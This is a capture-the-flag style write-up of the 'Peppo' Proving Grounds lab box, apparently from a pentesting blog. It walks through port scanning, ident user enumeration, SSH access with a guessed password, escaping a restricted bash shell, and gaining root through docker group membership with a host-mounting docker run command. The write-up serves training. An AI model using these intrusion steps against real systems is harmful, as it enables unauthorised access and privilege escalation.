> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/peppo.md).

# Peppo

## Nmap

```
sudo nmap 192.168.100.60 -p- -sS -sV

PORT      STATE  SERVICE           VERSION
22/tcp    open   ssh               OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp    closed domain
113/tcp   open   ident             FreeBSD identd
5432/tcp  open   postgresql        PostgreSQL DB 9.6.0 or later
8080/tcp  open   http              WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
10000/tcp open   snet-sensor-mgmt?
```

As `ident` is running we can use the Perl script `ident-user-enum` to identify which services are running under what user.

![](/files/-MWnVzq4GY4AJjoU5qO4)

Port 10000 reports it is running under the user 'eleanor'. I tried Bruteforcing the username on `SSH` and had no luck. Eventually simply trying `eleanor:elenaor` I was able to login on SSH.

![](/files/-MWnWRcB9CMV7psYzRvE)

We see from trying the `id` command we are locked in with a restricted bash shell. Checking out our command availability by viewing `$PATH` we can see what binaries we have access to.

![](/files/-MWnWqBst9fPVQhRfjbR)

Checking GTFObins for any of these binaries than can spawn a shell to escape a restricted one:

![](/files/-MWnX4XOWzKk1vklzgsE)

After running the above command we can export a new path and then spawn a python shell then again export the path to have full functionover the shell session.

```
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
```

![](/files/-MWnXXmMoGa9ts6UCaiU)

The command `id` shows we are a member of the docker group. GTFObins again shows a method for spawning a root shell when we are a member of the docker group.

![](/files/-MWnXlQjlemKHHPBxsFP)

First check what images we have available to us:

```
docker image ls
```

![](/files/-MWnXx09951CIAEG0FCB)

We can use the GTFObins command replacing the value `<alpine>` with one of the images listed above.

```
docker run -v /:/mnt --rm -it redmine chroot /mnt sh
```

Returning a shell as root:

![](/files/-MWnYFMr4TqCJFWk88Sr)

{% hint style="success" %}
If you found this page helpful to you, please rate below as per the feedback options. For any corrections or general communications, please see the root page [**Pentest Everything**](https://viperone.gitbook.io/pentest-everything/) for contact information.
{% endhint %}
